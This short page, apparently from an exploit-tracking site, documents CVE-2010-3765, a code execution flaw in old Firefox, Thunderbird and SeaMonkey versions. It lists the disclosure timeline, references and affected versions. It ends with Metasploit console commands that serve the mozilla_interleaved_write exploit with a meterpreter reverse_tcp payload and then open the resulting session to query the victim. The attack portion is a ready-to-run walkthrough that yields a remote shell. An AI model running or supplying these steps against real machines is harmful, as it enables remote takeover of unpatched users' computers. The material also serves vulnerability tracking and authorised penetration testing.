Timeline :

Vulnerability discovered in the wild
Vulnerability corrected by vendor the 2010-10-27
Vulnerability & Exploit-DB PoC disclosed by unknown the 2010-10-29
Metasploit PoC released the 2011-02-17

PoC provided by :

unknown
scriptjunkie

Reference(s) :

CVE-2010-3765
MFSA 2010-73
EDB-ID-15352
OSVDB-ID-68905

Affected version(s) :

All Firefox 3.6.x versions previous version 3.6.12
All Firefox 3.5.x versions previous version 3.5.15
All Thunderbird 3.1.x versions previous version 3.1.6
All Thunderbird 3.0.x versions previous version 3.0.10
All SeaMonkey 2.0.x versions previous version 2.0.10

Tested on Windows XP SP3 with :

Firefox 3.6.9 released the 2010-09-23

Description :

This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. This exploit is a metasploit port of the in-the-wild exploit.

Commands :

use exploit/windows/browser/mozilla_interleaved_write
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig